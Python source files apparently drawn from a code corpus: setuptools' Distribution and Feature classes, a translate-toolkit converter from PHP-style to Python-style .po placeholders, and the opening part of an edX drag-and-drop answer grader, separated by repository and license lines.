class Distribution(_Distribution):
"""Distribution with support for features, tests, and package data
This is an enhanced version of 'distutils.dist.Distribution' that
effectively adds the following new optional keyword arguments to 'setup()':
'install_requires' -- a string or sequence of strings specifying project
versions that the distribution requires when installed, in the format
used by 'pkg_resources.require()'. They will be installed
automatically when the package is installed. If you wish to use
packages that are not available in PyPI, or want to give your users an
alternate download location, you can add a 'find_links' option to the
'[easy_install]' section of your project's 'setup.cfg' file, and then
setuptools will scan the listed web pages for links that satisfy the
requirements.
'extras_require' -- a dictionary mapping names of optional "extras" to the
additional requirement(s) that using those extras incurs. For example,
this::
extras_require = dict(reST = ["docutils>=0.3", "reSTedit"])
indicates that the distribution can optionally provide an extra
capability called "reST", but it can only be used if docutils and
reSTedit are installed. If the user installs your package using
EasyInstall and requests one of your extras, the corresponding
additional requirements will be installed if needed.
'features' **deprecated** -- a dictionary mapping option names to
'setuptools.Feature'
objects. Features are a portion of the distribution that can be
included or excluded based on user options, inter-feature dependencies,
and availability on the current system. Excluded features are omitted
from all setup commands, including source and binary distributions, so
you can create multiple distributions from the same source tree.
Feature names should be valid Python identifiers, except that they may
contain the '-' (minus) sign. Features can be included or excluded
via the command line options '--with-X' and '--without-X', where 'X' is
the name of the feature. Whether a feature is included by default, and
whether you are allowed to control this from the command line, is
determined by the Feature object. See the 'Feature' class for more
information.
'test_suite' -- the name of a test suite to run for the 'test' command.
If the user runs 'python setup.py test', the package will be installed,
and the named test suite will be run. The format is the same as
would be used on a 'unittest.py' command line. That is, it is the
dotted name of an object to import and call to generate a test suite.
'package_data' -- a dictionary mapping package names to lists of filenames
or globs to use to find data files contained in the named packages.
If the dictionary has filenames or globs listed under '""' (the empty
string), those names will be searched for in every package, in addition
to any names for the specific package. Data files found using these
names/globs will be installed along with the package, in the same
location as the package. Note that globs are allowed to reference
the contents of non-package subdirectories, as long as you use '/' as
a path separator. (Globs are automatically converted to
platform-specific paths at runtime.)
In addition to these new keywords, this class also has several new methods
for manipulating the distribution's contents. For example, the 'include()'
and 'exclude()' methods can be thought of as in-place add and subtract
commands that add or remove packages, modules, extensions, and so on from
the distribution. They are used by the feature subsystem to configure the
distribution for the included and excluded features.
"""
_patched_dist = None
def patch_missing_pkg_info(self, attrs):
# Fake up a replacement for the data that would normally come from
# PKG-INFO, but which might not yet be built if this is a fresh
# checkout.
#
if not attrs or 'name' not in attrs or 'version' not in attrs:
return
key = pkg_resources.safe_name(str(attrs['name'])).lower()
dist = pkg_resources.working_set.by_key.get(key)
if dist is not None and not dist.has_metadata('PKG-INFO'):
dist._version = pkg_resources.safe_version(str(attrs['version']))
self._patched_dist = dist
def __init__(self, attrs=None):
have_package_data = hasattr(self, "package_data")
if not have_package_data:
self.package_data = {}
_attrs_dict = attrs or {}
if 'features' in _attrs_dict or 'require_features' in _attrs_dict:
Feature.warn_deprecated()
self.require_features = []
self.features = {}
self.dist_files = []
self.src_root = attrs and attrs.pop("src_root", None)
self.patch_missing_pkg_info(attrs)
# Make sure we have any eggs needed to interpret 'attrs'
if attrs is not None:
self.dependency_links = attrs.pop('dependency_links', [])
assert_string_list(self,'dependency_links',self.dependency_links)
if attrs and 'setup_requires' in attrs:
self.fetch_build_eggs(attrs['setup_requires'])
for ep in pkg_resources.iter_entry_points('distutils.setup_keywords'):
if not hasattr(self,ep.name):
setattr(self,ep.name,None)
_Distribution.__init__(self,attrs)
if isinstance(self.metadata.version, numbers.Number):
# Some people apparently take "version number" too literally :)
self.metadata.version = str(self.metadata.version)
if self.metadata.version is not None:
try:
ver = packaging.version.Version(self.metadata.version)
normalized_version = str(ver)
if self.metadata.version != normalized_version:
warnings.warn(
"The version specified requires normalization, "
"consider using '%s' instead of '%s'." % (
normalized_version,
self.metadata.version,
)
)
self.metadata.version = normalized_version
except (packaging.version.InvalidVersion, TypeError):
warnings.warn(
"The version specified (%r) is an invalid version, this "
"may not work as expected with newer versions of "
"setuptools, pip, and PyPI. Please see PEP 440 for more "
"details." % self.metadata.version
)
def parse_command_line(self):
"""Process features after parsing command line options"""
result = _Distribution.parse_command_line(self)
if self.features:
self._finalize_features()
return result
def _feature_attrname(self,name):
"""Convert feature name to corresponding option attribute name"""
return 'with_'+name.replace('-','_')
def fetch_build_eggs(self, requires):
"""Resolve pre-setup requirements"""
resolved_dists = pkg_resources.working_set.resolve(
pkg_resources.parse_requirements(requires),
installer=self.fetch_build_egg,
replace_conflicting=True,
)
for dist in resolved_dists:
pkg_resources.working_set.add(dist, replace=True)
def finalize_options(self):
_Distribution.finalize_options(self)
if self.features:
self._set_global_opts_from_features()
for ep in pkg_resources.iter_entry_points('distutils.setup_keywords'):
value = getattr(self,ep.name,None)
if value is not None:
ep.require(installer=self.fetch_build_egg)
ep.load()(self, ep.name, value)
if getattr(self, 'convert_2to3_doctests', None):
# XXX may convert to set here when we can rely on set being builtin
self.convert_2to3_doctests = [os.path.abspath(p) for p in self.convert_2to3_doctests]
else:
self.convert_2to3_doctests = []
def get_egg_cache_dir(self):
egg_cache_dir = os.path.join(os.curdir, '.eggs')
if not os.path.exists(egg_cache_dir):
os.mkdir(egg_cache_dir)
windows_support.hide_file(egg_cache_dir)
readme_txt_filename = os.path.join(egg_cache_dir, 'README.txt')
with open(readme_txt_filename, 'w') as f:
f.write('This directory contains eggs that were downloaded '
'by setuptools to build, test, and run plug-ins.\n\n')
f.write('This directory caches those eggs to prevent '
'repeated downloads.\n\n')
f.write('However, it is safe to delete this directory.\n\n')
return egg_cache_dir
def fetch_build_egg(self, req):
"""Fetch an egg needed for building"""
try:
cmd = self._egg_fetcher
cmd.package_index.to_scan = []
except AttributeError:
from setuptools.command.easy_install import easy_install
dist = self.__class__({'script_args':['easy_install']})
dist.parse_config_files()
opts = dist.get_option_dict('easy_install')
keep = (
'find_links', 'site_dirs', 'index_url', 'optimize',
'site_dirs', 'allow_hosts'
)
for key in list(opts):
if key not in keep:
del opts[key] # don't use any other settings
if self.dependency_links:
links = self.dependency_links[:]
if 'find_links' in opts:
links = opts['find_links'][1].split() + links
opts['find_links'] = ('setup', links)
install_dir = self.get_egg_cache_dir()
cmd = easy_install(
dist, args=["x"], install_dir=install_dir, exclude_scripts=True,
always_copy=False, build_directory=None, editable=False,
upgrade=False, multi_version=True, no_report=True, user=False
)
cmd.ensure_finalized()
self._egg_fetcher = cmd
return cmd.easy_install(req)
def _set_global_opts_from_features(self):
"""Add --with-X/--without-X options based on optional features"""
go = []
no = self.negative_opt.copy()
for name,feature in self.features.items():
self._set_feature(name,None)
feature.validate(self)
if feature.optional:
descr = feature.description
incdef = ' (default)'
excdef=''
if not feature.include_by_default():
excdef, incdef = incdef, excdef
go.append(('with-'+name, None, 'include '+descr+incdef))
go.append(('without-'+name, None, 'exclude '+descr+excdef))
no['without-'+name] = 'with-'+name
self.global_options = self.feature_options = go + self.global_options
self.negative_opt = self.feature_negopt = no
def _finalize_features(self):
"""Add/remove features and resolve dependencies between them"""
# First, flag all the enabled items (and thus their dependencies)
for name,feature in self.features.items():
enabled = self.feature_is_included(name)
if enabled or (enabled is None and feature.include_by_default()):
feature.include_in(self)
self._set_feature(name,1)
# Then disable the rest, so that off-by-default features don't
# get flagged as errors when they're required by an enabled feature
for name,feature in self.features.items():
if not self.feature_is_included(name):
feature.exclude_from(self)
self._set_feature(name,0)
def get_command_class(self, command):
"""Pluggable version of get_command_class()"""
if command in self.cmdclass:
return self.cmdclass[command]
for ep in pkg_resources.iter_entry_points('distutils.commands',command):
ep.require(installer=self.fetch_build_egg)
self.cmdclass[command] = cmdclass = ep.load()
return cmdclass
else:
return _Distribution.get_command_class(self, command)
def print_commands(self):
for ep in pkg_resources.iter_entry_points('distutils.commands'):
if ep.name not in self.cmdclass:
# don't require extras as the commands won't be invoked
cmdclass = ep._load()
self.cmdclass[ep.name] = cmdclass
return _Distribution.print_commands(self)
def _set_feature(self,name,status):
"""Set feature's inclusion status"""
setattr(self,self._feature_attrname(name),status)
def feature_is_included(self,name):
"""Return 1 if feature is included, 0 if excluded, 'None' if unknown"""
return getattr(self,self._feature_attrname(name))
def include_feature(self,name):
"""Request inclusion of feature named 'name'"""
if self.feature_is_included(name)==0:
descr = self.features[name].description
raise DistutilsOptionError(
descr + " is required, but was excluded or is not available"
)
self.features[name].include_in(self)
self._set_feature(name,1)
def include(self,**attrs):
"""Add items to distribution that are named in keyword arguments
For example, 'dist.exclude(py_modules=["x"])' would add 'x' to
the distribution's 'py_modules' attribute, if it was not already
there.
Currently, this method only supports inclusion for attributes that are
lists or tuples. If you need to add support for adding to other
attributes in this or a subclass, you can add an '_include_X' method,
where 'X' is the name of the attribute. The method will be called with
the value passed to 'include()'. So, 'dist.include(foo={"bar":"baz"})'
will try to call 'dist._include_foo({"bar":"baz"})', which can then
handle whatever special inclusion logic is needed.
"""
for k,v in attrs.items():
include = getattr(self, '_include_'+k, None)
if include:
include(v)
else:
self._include_misc(k,v)
def exclude_package(self,package):
"""Remove packages, modules, and extensions in named package"""
pfx = package+'.'
if self.packages:
self.packages = [
p for p in self.packages
if p != package and not p.startswith(pfx)
]
if self.py_modules:
self.py_modules = [
p for p in self.py_modules
if p != package and not p.startswith(pfx)
]
if self.ext_modules:
self.ext_modules = [
p for p in self.ext_modules
if p.name != package and not p.name.startswith(pfx)
]
def has_contents_for(self,package):
"""Return true if 'exclude_package(package)' would do something"""
pfx = package+'.'
for p in self.iter_distribution_names():
if p==package or p.startswith(pfx):
return True
def _exclude_misc(self,name,value):
"""Handle 'exclude()' for list/tuple attrs without a special handler"""
if not isinstance(value,sequence):
raise DistutilsSetupError(
"%s: setting must be a list or tuple (%r)" % (name, value)
)
try:
old = getattr(self,name)
except AttributeError:
raise DistutilsSetupError(
"%s: No such distribution setting" % name
)
if old is not None and not isinstance(old,sequence):
raise DistutilsSetupError(
name+": this setting cannot be changed via include/exclude"
)
elif old:
setattr(self,name,[item for item in old if item not in value])
def _include_misc(self,name,value):
"""Handle 'include()' for list/tuple attrs without a special handler"""
if not isinstance(value,sequence):
raise DistutilsSetupError(
"%s: setting must be a list (%r)" % (name, value)
)
try:
old = getattr(self,name)
except AttributeError:
raise DistutilsSetupError(
"%s: No such distribution setting" % name
)
if old is None:
setattr(self,name,value)
elif not isinstance(old,sequence):
raise DistutilsSetupError(
name+": this setting cannot be changed via include/exclude"
)
else:
setattr(self,name,old+[item for item in value if item not in old])
def exclude(self,**attrs):
"""Remove items from distribution that are named in keyword arguments
For example, 'dist.exclude(py_modules=["x"])' would remove 'x' from
the distribution's 'py_modules' attribute. Excluding packages uses
the 'exclude_package()' method, so all of the package's contained
packages, modules, and extensions are also excluded.
Currently, this method only supports exclusion from attributes that are
lists or tuples. If you need to add support for excluding from other
attributes in this or a subclass, you can add an '_exclude_X' method,
where 'X' is the name of the attribute. The method will be called with
the value passed to 'exclude()'. So, 'dist.exclude(foo={"bar":"baz"})'
will try to call 'dist._exclude_foo({"bar":"baz"})', which can then
handle whatever special exclusion logic is needed.
"""
for k,v in attrs.items():
exclude = getattr(self, '_exclude_'+k, None)
if exclude:
exclude(v)
else:
self._exclude_misc(k,v)
def _exclude_packages(self,packages):
if not isinstance(packages,sequence):
raise DistutilsSetupError(
"packages: setting must be a list or tuple (%r)" % (packages,)
)
list(map(self.exclude_package, packages))
def _parse_command_opts(self, parser, args):
# Remove --with-X/--without-X options when processing command args
self.global_options = self.__class__.global_options
self.negative_opt = self.__class__.negative_opt
# First, expand any aliases
command = args[0]
aliases = self.get_option_dict('aliases')
while command in aliases:
src,alias = aliases[command]
del aliases[command] # ensure each alias can expand only once!
import shlex
args[:1] = shlex.split(alias,True)
command = args[0]
nargs = _Distribution._parse_command_opts(self, parser, args)
# Handle commands that want to consume all remaining arguments
cmd_class = self.get_command_class(command)
if getattr(cmd_class,'command_consumes_arguments',None):
self.get_option_dict(command)['args'] = ("command line", nargs)
if nargs is not None:
return []
return nargs
def get_cmdline_options(self):
"""Return a '{cmd: {opt:val}}' map of all command-line options
Option names are all long, but do not include the leading '--', and
contain dashes rather than underscores. If the option doesn't take
an argument (e.g. '--quiet'), the 'val' is 'None'.
Note that options provided by config files are intentionally excluded.
"""
d = {}
for cmd,opts in self.command_options.items():
for opt,(src,val) in opts.items():
if src != "command line":
continue
opt = opt.replace('_','-')
if val==0:
cmdobj = self.get_command_obj(cmd)
neg_opt = self.negative_opt.copy()
neg_opt.update(getattr(cmdobj,'negative_opt',{}))
for neg,pos in neg_opt.items():
if pos==opt:
opt=neg
val=None
break
else:
raise AssertionError("Shouldn't be able to get here")
elif val==1:
val = None
d.setdefault(cmd,{})[opt] = val
return d
def iter_distribution_names(self):
"""Yield all packages, modules, and extension names in distribution"""
for pkg in self.packages or ():
yield pkg
for module in self.py_modules or ():
yield module
for ext in self.ext_modules or ():
if isinstance(ext,tuple):
name, buildinfo = ext
else:
name = ext.name
if name.endswith('module'):
name = name[:-6]
yield name
def handle_display_options(self, option_order):
"""If there were any non-global "display-only" options
(--help-commands or the metadata display options) on the command
line, display the requested info and return true; else return
false.
"""
import sys
if PY2 or self.help_commands:
return _Distribution.handle_display_options(self, option_order)
# Stdout may be StringIO (e.g. in tests)
import io
if not isinstance(sys.stdout, io.TextIOWrapper):
return _Distribution.handle_display_options(self, option_order)
# Don't wrap stdout if utf-8 is already the encoding. Provides
# workaround for #334.
if sys.stdout.encoding.lower() in ('utf-8', 'utf8'):
return _Distribution.handle_display_options(self, option_order)
# Print metadata in UTF-8 no matter the platform
encoding = sys.stdout.encoding
errors = sys.stdout.errors
newline = sys.platform != 'win32' and '\n' or None
line_buffering = sys.stdout.line_buffering
sys.stdout = io.TextIOWrapper(
sys.stdout.detach(), 'utf-8', errors, newline, line_buffering)
try:
return _Distribution.handle_display_options(self, option_order)
finally:
sys.stdout = io.TextIOWrapper(
sys.stdout.detach(), encoding, errors, newline, line_buffering)
# Install it throughout the distutils
for module in distutils.dist, distutils.core, distutils.cmd:
module.Distribution = Distribution
class Feature:
"""
**deprecated** -- The `Feature` facility was never completely implemented
or supported, `has reported issues
<https://bitbucket.org/pypa/setuptools/issue/58>`_ and will be removed in
a future version.
A subset of the distribution that can be excluded if unneeded/wanted
Features are created using these keyword arguments:
'description' -- a short, human readable description of the feature, to
be used in error messages, and option help messages.
'standard' -- if true, the feature is included by default if it is
available on the current system. Otherwise, the feature is only
included if requested via a command line '--with-X' option, or if
another included feature requires it. The default setting is 'False'.
'available' -- if true, the feature is available for installation on the
current system. The default setting is 'True'.
'optional' -- if true, the feature's inclusion can be controlled from the
command line, using the '--with-X' or '--without-X' options. If
false, the feature's inclusion status is determined automatically,
based on 'available', 'standard', and whether any other feature
requires it. The default setting is 'True'.
'require_features' -- a string or sequence of strings naming features
that should also be included if this feature is included. Defaults to
empty list. May also contain 'Require' objects that should be
added/removed from the distribution.
'remove' -- a string or list of strings naming packages to be removed
from the distribution if this feature is *not* included. If the
feature *is* included, this argument is ignored. This argument exists
to support removing features that "crosscut" a distribution, such as
defining a 'tests' feature that removes all the 'tests' subpackages
provided by other features. The default for this argument is an empty
list. (Note: the named package(s) or modules must exist in the base
distribution when the 'setup()' function is initially called.)
other keywords -- any other keyword arguments are saved, and passed to
the distribution's 'include()' and 'exclude()' methods when the
feature is included or excluded, respectively. So, for example, you
could pass 'packages=["a","b"]' to cause packages 'a' and 'b' to be
added or removed from the distribution as appropriate.
A feature must include at least one 'requires', 'remove', or other
keyword argument. Otherwise, it can't affect the distribution in any way.
Note also that you can subclass 'Feature' to create your own specialized
feature types that modify the distribution in other ways when included or
excluded. See the docstrings for the various methods here for more detail.
Aside from the methods, the only feature attributes that distributions look
at are 'description' and 'optional'.
"""
@staticmethod
def warn_deprecated():
warnings.warn(
"Features are deprecated and will be removed in a future "
"version. See http://bitbucket.org/pypa/setuptools/65.",
DeprecationWarning,
stacklevel=3,
)
def __init__(self, description, standard=False, available=True,
optional=True, require_features=(), remove=(), **extras):
self.warn_deprecated()
self.description = description
self.standard = standard
self.available = available
self.optional = optional
if isinstance(require_features,(str,Require)):
require_features = require_features,
self.require_features = [
r for r in require_features if isinstance(r,str)
]
er = [r for r in require_features if not isinstance(r,str)]
if er: extras['require_features'] = er
if isinstance(remove,str):
remove = remove,
self.remove = remove
self.extras = extras
if not remove and not require_features and not extras:
raise DistutilsSetupError(
"Feature %s: must define 'require_features', 'remove', or at least one"
" of 'packages', 'py_modules', etc."
)
def include_by_default(self):
"""Should this feature be included by default?"""
return self.available and self.standard
def include_in(self,dist):
"""Ensure feature and its requirements are included in distribution
You may override this in a subclass to perform additional operations on
the distribution. Note that this method may be called more than once
per feature, and so should be idempotent.
"""
if not self.available:
raise DistutilsPlatformError(
self.description+" is required,"
"but is not available on this platform"
)
dist.include(**self.extras)
for f in self.require_features:
dist.include_feature(f)
def exclude_from(self,dist):
"""Ensure feature is excluded from distribution
You may override this in a subclass to perform additional operations on
the distribution. This method will be called at most once per
feature, and only after all included features have been asked to
include themselves.
"""
dist.exclude(**self.extras)
if self.remove:
for item in self.remove:
dist.exclude_package(item)
def validate(self,dist):
"""Verify that feature makes sense in context of distribution
This method is called by the distribution just before it parses its
command line. It checks to ensure that the 'remove' attribute, if any,
contains only valid package/module names that are present in the base
distribution when 'setup()' is called. You may override it in a
subclass to perform any other required validation of the feature
against a target distribution.
"""
for item in self.remove:
if not dist.has_contents_for(item):
raise DistutilsSetupError(
"%s wants to be able to remove %s, but the distribution"
" doesn't contain any packages or modules under %s"
% (self.description, item, item)
)
|
mit
|
surajssd/kuma
|
vendor/packages/translate/tools/phppo2pypo.py
|
25
|
3433
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Mozilla Corporation, Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Convert PHP format .po files to Python format .po files.
"""
import re
from translate.misc.multistring import multistring
from translate.storage import po
class phppo2pypo:
def convertstore(self, inputstore):
"""Converts a given .po file (PHP Format) to a Python format .po file, the difference being
how variable substitutions work. PHP uses a %1$s format, and Python uses
a {0} format (zero indexed). This method will convert, e.g.:
I have %2$s apples and %1$s oranges
to
I have {1} apples and {0} oranges
This method ignores strings with %s as both languages will recognize that.
"""
thetargetfile = po.pofile(inputfile="")
for unit in inputstore.units:
newunit = self.convertunit(unit)
thetargetfile.addunit(newunit)
return thetargetfile
def convertunit(self, unit):
developer_notes = unit.getnotes(origin="developer")
translator_notes = unit.getnotes(origin="translator")
unit.removenotes()
unit.addnote(self.convertstrings(developer_notes))
unit.addnote(self.convertstrings(translator_notes))
unit.source = self.convertstrings(unit.source)
unit.target = self.convertstrings(unit.target)
return unit
def convertstring(self, input):
return re.sub('%(\d)\$s', lambda x: "{%d}" % (int(x.group(1)) - 1), input)
def convertstrings(self, input):
if isinstance(input, multistring):
strings = input.strings
elif isinstance(input, list):
strings = input
else:
return self.convertstring(input)
for index, string in enumerate(strings):
            strings[index] = self.convertstring(string)
return multistring(strings)
def convertphp2py(inputfile, outputfile, template=None):
"""Converts from PHP .po format to Python .po format
:param inputfile: file handle of the source
:param outputfile: file handle to write to
:param template: unused
"""
convertor = phppo2pypo()
inputstore = po.pofile(inputfile)
outputstore = convertor.convertstore(inputstore)
if outputstore.isempty():
return False
outputfile.write(str(outputstore))
return True
def main(argv=None):
"""Converts PHP .po files to Python .po files."""
from translate.convert import convert
formats = {"po": ("po", convertphp2py)}
parser = convert.ConvertOptionParser(formats, description=__doc__)
parser.run(argv)
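# Hypothetical helper, not part of the original tool: a direct check of the
# placeholder rewrite that convertstore() applies to every unit.
def _demo_substitution():
    converter = phppo2pypo()
    # PHP's 1-based "%2$s"/"%1$s" become Python's 0-based "{1}"/"{0}";
    # a plain "%s" is left untouched because both formats accept it.
    assert (converter.convertstring("I have %2$s apples and %1$s oranges")
            == "I have {1} apples and {0} oranges")
    assert converter.convertstring("Hello %s") == "Hello %s"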
if __name__ == '__main__':
main()
|
mpl-2.0
|
abdoosh00/edx-platform
|
common/lib/sandbox-packages/verifiers/draganddrop.py
|
70
|
15072
|
""" Grader of drag and drop input.
Client side behavior: user can drag and drop images from list on base image.
Then json returned from client is:
{
"draggable": [
{ "image1": "t1" },
{ "ant": "t2" },
{ "molecule": "t3" },
]
}
values are target names.
or:
{
"draggable": [
{ "image1": "[10, 20]" },
{ "ant": "[30, 40]" },
{ "molecule": "[100, 200]" },
]
}
values are (x,y) coordinates of centers of dragged images.
"""
import json
def flat_user_answer(user_answer):
"""
Convert nested `user_answer` to flat format.
{'up': {'first': {'p': 'p_l'}}}
to
{'up': 'p_l[p][first]'}
"""
def parse_user_answer(answer):
key = answer.keys()[0]
value = answer.values()[0]
if isinstance(value, dict):
            # Build a composite value, e.g. 'p_l[p][first]'
            # from {'first': {'p': 'p_l'}}.
complex_value_list = []
v_value = value
while isinstance(v_value, dict):
v_key = v_value.keys()[0]
v_value = v_value.values()[0]
complex_value_list.append(v_key)
complex_value = '{0}'.format(v_value)
for i in reversed(complex_value_list):
complex_value = '{0}[{1}]'.format(complex_value, i)
res = {key: complex_value}
return res
else:
return answer
result = []
for answer in user_answer:
parse_answer = parse_user_answer(answer)
result.append(parse_answer)
return result
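# Hypothetical sanity check, not part of the original file, of the flattening
# behaviour documented above: nested placements collapse into bracketed keys,
# while plain placements pass through unchanged.
def _demo_flat_user_answer():
    nested = [{'up': {'first': {'p': 'p_l'}}}, {'ant': 't2'}]
    assert flat_user_answer(nested) == [{'up': 'p_l[p][first]'}, {'ant': 't2'}]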
class PositionsCompare(list):
""" Class for comparing positions.
Args:
list or string::
"abc" - target
[10, 20] - list of integers
[[10,20], 200] list of list and integer
"""
def __eq__(self, other):
""" Compares two arguments.
Default lists behavior is conversion of string "abc" to list
["a", "b", "c"]. We will use that.
If self or other is empty - returns False.
Args:
self, other: str, unicode, list, int, float
Returns: bool
"""
# checks if self or other is not empty list (empty lists = false)
if not self or not other:
return False
if (isinstance(self[0], (list, int, float)) and
isinstance(other[0], (list, int, float))):
return self.coordinate_positions_compare(other)
elif (isinstance(self[0], (unicode, str)) and
isinstance(other[0], (unicode, str))):
return ''.join(self) == ''.join(other)
        else:
            # Improper argument types: neither a pair of coordinate-style
            # (int / float / list) values nor a pair of string / unicode values.
            return False
def __ne__(self, other):
return not self.__eq__(other)
def coordinate_positions_compare(self, other, r=10):
""" Checks if self is equal to other inside radius of forgiveness
(default 10 px).
Args:
self, other: [x, y] or [[x, y], r], where r is radius of
forgiveness;
x, y, r: int
Returns: bool.
"""
# get max radius of forgiveness
if isinstance(self[0], list): # [(x, y), r] case
r = max(self[1], r)
x1, y1 = self[0]
else:
x1, y1 = self
if isinstance(other[0], list): # [(x, y), r] case
r = max(other[1], r)
x2, y2 = other[0]
else:
x2, y2 = other
if (x2 - x1) ** 2 + (y2 - y1) ** 2 > r * r:
return False
return True
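# Hypothetical examples, not part of the original file, of the comparison
# semantics above: target ids compare as strings, coordinates compare within
# the radius of forgiveness.
def _demo_positions_compare():
    assert PositionsCompare("t1") == PositionsCompare("t1")
    # (14, 12) lies within the default 10 px radius of (10, 10).
    assert PositionsCompare([10, 10]) == PositionsCompare([14, 12])
    # [[10, 10], 30] widens the radius to 30 px, but (45, 10) is still too far.
    assert PositionsCompare([[10, 10], 30]) != PositionsCompare([45, 10])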
class DragAndDrop(object):
""" Grader class for drag and drop inputtype.
"""
def grade(self):
        ''' Grade the user answer.
        Checks whether every draggable is placed on its proper target or at
        the proper coordinates within the radius of forgiveness (default is 10).
Returns: bool.
'''
for draggable in self.excess_draggables:
if self.excess_draggables[draggable]:
return False # user answer has more draggables than correct answer
        # The number of draggables in user_groups may differ from that in
        # correct_groups; that is incorrect, except for the special case with 'number'.
for index, draggable_ids in enumerate(self.correct_groups):
            # Special case for the 'number' rule: with reusable draggables,
            # self.user_groups may contain duplicates, e.g.
            # {'1': [u'2', u'2', u'2'], '0': [u'1', u'1'], '2': [u'3']}.
            # If '+number' is in the rule, keep the duplicates and strip
            # '+number' from the rule.
current_rule = self.correct_positions[index].keys()[0]
if 'number' in current_rule:
rule_values = self.correct_positions[index][current_rule]
                # Clean the rule, but do not deduplicate the items.
self.correct_positions[index].pop(current_rule, None)
parsed_rule = current_rule.replace('+', '').replace('number', '')
self.correct_positions[index][parsed_rule] = rule_values
            else:  # remove duplicates
self.user_groups[index] = list(set(self.user_groups[index]))
if sorted(draggable_ids) != sorted(self.user_groups[index]):
return False
        # Check that in every group, under that group's rule, the user positions
        # of every element match the correct positions.
for index, _ in enumerate(self.correct_groups):
rules_executed = 0
for rule in ('exact', 'anyof', 'unordered_equal'):
# every group has only one rule
if self.correct_positions[index].get(rule, None):
rules_executed += 1
if not self.compare_positions(
self.correct_positions[index][rule],
self.user_positions[index]['user'], flag=rule):
return False
if not rules_executed: # no correct rules for current group
                # probably an XML content mistake - wrong rule names
return False
return True
def compare_positions(self, correct, user, flag):
""" Compares two lists of positions with flag rules. Order of
correct/user arguments is matter only in 'anyof' flag.
Rules description:
'exact' means 1-1 ordered relationship::
[el1, el2, el3] is 'exact' equal to [el5, el6, el7] when
el1 == el5, el2 == el6, el3 == el7.
Equality function is custom, see below.
'anyof' means subset relationship::
user = [el1, el2] is 'anyof' equal to correct = [el1, el2, el3]
when
set(user) <= set(correct).
'anyof' is ordered relationship. It always checks if user
is subset of correct
Equality function is custom, see below.
Examples:
- many draggables per position:
user ['1','2','2','2'] is 'anyof' equal to ['1', '2', '3']
- draggables can be placed in any order:
user ['1','2','3','4'] is 'anyof' equal to ['4', '2', '1', 3']
'unordered_equal' is same as 'exact' but disregards on order
Equality functions:
Equality functon depends on type of element. They declared in
PositionsCompare class. For position like targets
ids ("t1", "t2", etc..) it is string equality function. For coordinate
positions ([1,2] or [[1,2], 15]) it is coordinate_positions_compare
function (see docstrings in PositionsCompare class)
Args:
correst, user: lists of positions
Returns: True if within rule lists are equal, otherwise False.
"""
if flag == 'exact':
if len(correct) != len(user):
return False
for el1, el2 in zip(correct, user):
if PositionsCompare(el1) != PositionsCompare(el2):
return False
if flag == 'anyof':
for u_el in user:
for c_el in correct:
if PositionsCompare(u_el) == PositionsCompare(c_el):
break
else:
                    # The else clause of a for loop runs only if the loop
                    # finished without hitting a break. Here that means no
                    # element of 'correct' matched this element of 'user',
                    # so we found a 'user' element that is not in 'correct'
                    # and return False.
return False
if flag == 'unordered_equal':
if len(correct) != len(user):
return False
temp = correct[:]
for u_el in user:
for c_el in temp:
if PositionsCompare(u_el) == PositionsCompare(c_el):
temp.remove(c_el)
break
else:
                    # Same as above: a 'user' element with no remaining match
                    # in 'correct' means the lists are not equal.
return False
return True
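    # Illustrative examples of the three rules (hypothetical values, not from
    # the original file):
    #   'exact':           ['t1', 't2'] matches ['t1', 't2'] but not ['t2', 't1']
    #   'unordered_equal': ['t1', 't2'] matches ['t2', 't1'] (same elements, any order)
    #   'anyof':           user ['t1', 't1', 't2'] matches correct ['t1', 't2', 't3'],
    #                      since every user position appears somewhere in correct.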
def __init__(self, correct_answer, user_answer):
""" Populates DragAndDrop variables from user_answer and correct_answer.
        If correct_answer is a dict, it is converted to list form.
        A correct answer in dict form is a simple structure for fast and simple
        grading. Example of a correct answer in dict form::
correct_answer = {'name4': 't1',
'name_with_icon': 't1',
'5': 't2',
'7': 't2'}
        It is a draggable_name: draggable_position mapping.
        The advanced form converted from the simple form uses the 'exact' rule
        for matching.
Correct answer in list form is designed for advanced cases::
correct_answers = [
{
'draggables': ['1', '2', '3', '4', '5', '6'],
'targets': [
's_left', 's_right', 's_sigma', 's_sigma_star', 'p_pi_1', 'p_pi_2'],
'rule': 'anyof'},
{
'draggables': ['7', '8', '9', '10'],
'targets': ['p_left_1', 'p_left_2', 'p_right_1', 'p_right_2'],
'rule': 'anyof'
}
]
        An advanced answer in list form is a list of dicts, and every dict must
        have 3 keys: 'draggables', 'targets' and 'rule'. The 'draggables' value
        is a list of draggable ids, the 'targets' value is a list of target ids,
        and the 'rule' value is one of 'exact', 'anyof', 'unordered_equal',
        'anyof+number' or 'unordered_equal+number'.
        The advanced form uses "all dicts must match with their rule" logic.
        The same draggable cannot appear in more than one dict.
        The behavior is explained in more detail in the Sphinx documentation.
Args:
user_answer: json
correct_answer: dict or list
"""
self.correct_groups = [] # Correct groups from xml.
self.correct_positions = [] # Correct positions for comparing.
self.user_groups = [] # Will be populated from user answer.
self.user_positions = [] # Will be populated from user answer.
# Convert from dict answer format to list format.
if isinstance(correct_answer, dict):
tmp = []
for key, value in correct_answer.items():
tmp.append({
'draggables': [key],
'targets': [value],
'rule': 'exact'})
correct_answer = tmp
# Convert string `user_answer` to object.
user_answer = json.loads(user_answer)
# This dictionary will hold a key for each draggable the user placed on
# the image. The value is True if that draggable is not mentioned in any
# correct_answer entries. If the draggable is mentioned in at least one
# correct_answer entry, the value is False.
# default to consider every user answer excess until proven otherwise.
        self.excess_draggables = dict((users_draggable.keys()[0], True)
for users_draggable in user_answer)
# Convert nested `user_answer` to flat format.
user_answer = flat_user_answer(user_answer)
# Create identical data structures from user answer and correct answer.
for answer in correct_answer:
user_groups_data = []
user_positions_data = []
for draggable_dict in user_answer:
# Draggable_dict is 1-to-1 {draggable_name: position}.
draggable_name = draggable_dict.keys()[0]
if draggable_name in answer['draggables']:
user_groups_data.append(draggable_name)
user_positions_data.append(
draggable_dict[draggable_name])
# proved that this is not excess
self.excess_draggables[draggable_name] = False
